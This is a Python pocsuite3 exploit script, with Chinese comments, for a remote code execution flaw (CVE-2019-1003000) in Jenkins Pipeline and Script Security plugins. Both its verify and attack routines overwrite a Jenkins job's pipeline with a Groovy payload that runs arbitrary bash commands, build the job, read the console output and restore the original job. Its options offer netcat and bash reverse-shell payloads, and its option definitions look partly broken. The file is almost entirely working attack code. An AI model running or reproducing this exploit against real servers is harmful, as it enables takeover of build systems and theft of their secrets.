Jenkins_Script-Security_Pipeline插件远程代码执行漏洞_CVE-2019-1003000.py

#!/usr/bin/env python3
# coding: utf-8
from pocsuite3.api import Output, POCBase, register_poc, requests, OptDict
import random, json
from collections import OrderedDict
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY
import jenkins
from xml.etree import ElementTree as ET
import time

# 前面几行固定，编码、继承类、import库

class TestPOC(POCBase):
    vulID = 'exp-55'
    author = 'WYS'
    appName = 'Jenkins'  # 应用名称
    appVersion = 'Pipeline: Declarative Plugin up to and including 1.3.4\n' \
                 'Pipeline: Groovy Plugin up to and including 2.61\n' \
                 'Script Security Plugin up to and including 1.49'  # 文件名称提取即可
    name = u'Jenkins 插件远程代码执行漏洞(CVE-2019-1003000)'  # 写文件名称即可
    desc = u'Jenkins 插件远程代码执行漏洞'  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站

    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        o["job"] = OptDict(selected="bash", default=payload)
        o["user"] = OptDict(selected="bash", default=payload)
        o["pass"] = OptDict(selected="bash", default=payload)
        return o


    def _verify(self):
        result = {}
        url = self.url
        job_name = self.get_option("job")
        username = self.get_option("user")
        password = self.get_option("pass")
        cmd = "echo test"
        payload = '''
                                import org.buildobjects.process.ProcBuilder
                                @Grab('org.buildobjects:jproc:2.2.3')
                                class Dummy{ }

                                print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString()
                                '''
        server = jenkins.Jenkins(url, username, password)
        try:
            ori_job_config=server.get_job_config(job_name)
            #print('get_job_config success')
            ee = ET.fromstring(ori_job_config)
            ee.find('definition/script').text = payload % cmd

            job_config = ET.tostring(ee, encoding='utf8', method='xml')
            server.reconfig_job(job_name, job_config)
            time.sleep(3)
            queue_number = server.build_job(job_name)
            time.sleep(3)
            queue_item_info = {}
            while 'executable' not in queue_item_info:
                queue_item_info = server.get_queue_item(queue_number)
                time.sleep(1)
            server.reconfig_job(job_name, ori_job_config)
            time.sleep(3)
            last_build_number = server.get_job_info(job_name)['lastBuild']['number']
            console_output = server.get_build_console_output(job_name, last_build_number)
            console_output1 = console_output.split('echo', 2)[1]
            console_output2 = console_output1.split('[Pipeline]', 2)[0]
            result['VerifyInfo'] = {}  # 固定
            result['VerifyInfo']['URL'] = self.url  # 固定
            result['VerifyInfo']['INFO'] = console_output2  # 固定

        except:
            print('target is not vulnerable')


        return self.parse_output(result)

    def _attack(self):
        result = {}
        url = self.url
        job_name = self.get_option("job")
        username = self.get_option("user")
        password = self.get_option("pass")
        cmd = self.get_option("command")
        payload = '''
                    import org.buildobjects.process.ProcBuilder
                    @Grab('org.buildobjects:jproc:2.2.3')
                    class Dummy{ }

                    print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString()
                    '''
        server = jenkins.Jenkins(url, username, password)
        #print(server)
        try:
            ori_job_config = server.get_job_config(job_name)
            ee = ET.fromstring(ori_job_config)
            ee.find('definition/script').text = payload % cmd
            job_config = ET.tostring(ee, encoding='utf8', method='xml')
            server.reconfig_job(job_name, job_config)
            time.sleep(3)
            queue_number = server.build_job(job_name)
            time.sleep(3)
            queue_item_info = {}
            while 'executable' not in queue_item_info:
               queue_item_info = server.get_queue_item(queue_number)
               time.sleep(1)
            server.reconfig_job(job_name, ori_job_config)
            time.sleep(3)
            last_build_number = server.get_job_info(job_name)['lastBuild']['number']
            console_output = server.get_build_console_output(job_name, last_build_number)
            #print(console_output)
            console_output1=console_output.split('echo',2)[1]
            console_output2 = console_output1.split('[Pipeline]', 2)[0]
            result['VerifyInfo'] = {}  # 固定
            result['VerifyInfo']['URL'] = self.url  # 固定
            result['VerifyInfo']['INFO'] = console_output2 # 固定
        except:
            print('target is not vulnerable')
        return self.parse_output(result)

      # 固定
        #return self._attack

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(TestPOC)